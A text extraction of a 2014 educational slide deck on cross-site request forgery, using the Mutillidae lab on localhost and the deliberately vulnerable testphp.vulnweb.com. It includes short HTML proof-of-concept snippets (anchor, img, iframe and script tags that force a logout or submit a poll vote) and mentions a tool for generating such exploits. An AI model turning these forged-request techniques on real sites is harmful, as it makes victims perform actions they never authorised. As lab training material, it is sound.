OH NO, WAS THAT  CSRF ?

Abhinav Sejpal

WHO AM I

I' M new Generation Exploratory Testy

Researcher & Reader in free time

Spekear at 

Facilitator at Weekend Testing

Crowd Tester (AKA. Bug bounty Hunter)  

Reported Security Vulnerabilities for 50+ unique customers all over the world 

inlcluding Apple, yahoo, Outlook, adobe & etc.

Proficient at Functional, Usability , Accessibility & Compatibility Testing

Love to develop nasty code  & Hack it :)

Works as Quality Analyst at

AKA. Bug Wrangler

Null  & OWASP Co mmunity

passbrains.com

~Publication ~

DISCLAIMER

This Presentation is intended for educational purposes only and I cannot be held liable for

any kind of damages done whatsoever to your machine, or other damages.  Please - Don't try this attack on any others system without having context knowledge or

permission, this may harm to someone directly or indirectly.

Feel free to use this presentation for practice or education purpose.

^ I hope - You gotcha ^

SOCIAL MEDIA FEED

Hashtag for this session

     # ,  # BitzNightTesting CSRF

: Twitter handle for feedback :

 @   @ weekendtesting Abhinav_Sejpal

G+ 

http://goo.gl/kMAOs1

AGENDA

Introducation Set up Pen Testing LAB Overview of HTTP RequestIntercept the HTTP Request using Proxy (MITM)Understanding cross site attacksTesting for a cross site request forgery riskAttack Anti-forgery AttacksCommon Defences Against CSRF

SETUP THE TEST LAB

Install XAMPP

for:Acronym

X (to be read as "cross", meaning )cross-platformApache HTTP ServerMySQLPHPPerl

Why MySQL?  is  Girlfriend of PHP

TARGETED APPLICATION

Client Side language : HTML & Javascript Server side Language: PHP

DB : MYSQL 

Why PHP ?  - Any answer Here?

MySQL <3 

http://w3techs.com/technologies/overview/programming_language/all

PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE

PROGRAMMING LANGUAGE.

PHP: 244M SITES

2.1M IP ADDRESSES

2013 Server-side Programming Language of the Year

Don't Mind Power of PHP > Facebook & yahoo 

http://w3techs.com/blog/entry/web_technologies_of_the_year_2013

It's a free, open source web application provided to allowsecurity enthusiast to pen-test and hack a web application.

V.2X developed by  aka

PLAY GROUND

 MUTILLIDAE

Jeremy Druin webpwnized.

ALL SET WITH MULTILLIDAE ?

AM I VULNERABLE TO 'CSRF' ?

OWASP A8 - CSRF

CROSS-SITE REQUEST FORGERY

Facebook Post

Linkedin Panel

HOW WEB WORKS ?

' Send Request '

Proxy (Man in the middle)

Intercept Request & Respond from client

CSRF ATTACK CYCLE

CSRF AKA. XSRF

  THE ATTACKER EXPLOITS THE TRUST A WEBSITE

HAS AGAINST A USER’S BROWSER.

 Permission faking\stealing Disruption of the normal sequence of the site

http://127.0.0.1/xampp/mutillidae/index.php?do=logout

DEMO #1Login ID - admin

password - adminpass

HTTP GET Request

<a href= >

: ANSWER  DEMO 1:

<html>

<title> CSRF Demo 1 </title>

http://127.0.0.1/xampp/mutillidae/index.php?do=logout

Click me </a>

</html>

Yes it's not dangerous but annoying

UNDERSTANDING

Logout page has a simple HTTP GET that required noconfirmation

Every user who visited that page would immediately belogged out - that's CSRF in action.

SO WHAT DO YOU THINK,IT'S ALL ABOUT CLICK ?

ssh, No!!

Would you like to write CSRF exploit without click ??

<img src= >

CSRF GET Request with Image Tag

<html>

<title> CSRF Demo 1 </title>

http://127.0.0.1/xampp/mutillidae/index.php?do=logout

</html>

HTTP REQUEST

<iframe src="http://127.0.0.1/xampp/mutillidae/index.php?

do=logout"></iframe>

           <script> var X= new Image();                                                X.src= "

http://127.0.0.1/xampp/mutillidae/index.php?do=logout";                

</script>

CHALLENGE  #1

<html>

<title> CSRF Demo 1 </title>

<a href =

> Click me </a>

</html>

:: SOLUTION #1 ::

http://127.0.0.1/xampp/mutillidae/index.php?page=user-poll.php&csrf-

token=&choice=nmap&initials=n&user-poll-php-submit-button=Submit+Vote

DOES IT EASY TO CREATE CSRF HTTP REQUEST ?

No - you should try out 

 IronWASP

   CSRF PoC Generator - Tool for automatically generatingexploits for CSRF vulnerabilities

* One Click POC *

* Hybrid automation *

thanks a ton to Lava & Jayesh 

{ Post HTTP Request }

CHALLENGE  #2

CHALLENGE  #3

Add user with out admin knowledge

LIVE CHALLENGE

* SIGNUP DISABLED * PLEASE USE THE USERNAME TEST AND THE

PASSWORD TEST

CSRF & XSRFUpdate the user info. without their knowledge

http://testphp.vulnweb.com/userinfo.php

Copyright © 2014, Acunetix Ltd

Can we exploit this with Level #2 ?

You've been CSRF'd with static token! 

Lets try with Level - 3

~ Keep Hacking your Code ~

There is no silver bullet to stop this - Just Trust your code

POPULAR COOL FINDINGS

by Amol Facebook CSRF worth USD 5000

GOOGLE GROUPS PROFILE CSRFGoogle Account display pic deletion

Facebook Account deactivation

Advance Leanings -  CSRF Token Validation Fail

http://haiderm.com/csrf-token-protection-bypass-methods/

INDIAN HACKERS/INFOSEC GUYS & GROUPS YOU

SHOULD BE FOLLOWING IN TWITTER

Thank-you http://garage4hackers.com/ community

- Twitter Folks -

 @  @ , @ , @  

CREDITS

riyazwalikar TroyHunt yog3sharma makash& @

Big thank You to @  , @  & you All.

anatshri

weekendtesting srinivasskc

YES - I'M DONE!

Feel free to write me at bug.wrangler at outlook.com

LICENSE AND COPYRIGHTS

https://slides.com/abhinavsejpal/weekend-testing-csrf

copyrights 2013-2014 Abhinav Sejpal

-----

  ( CC BY-NC-ND 3.0)

Attribution-NonCommercial-NoDerivs 3.0 Unported

  Dedicated to my lovely daddy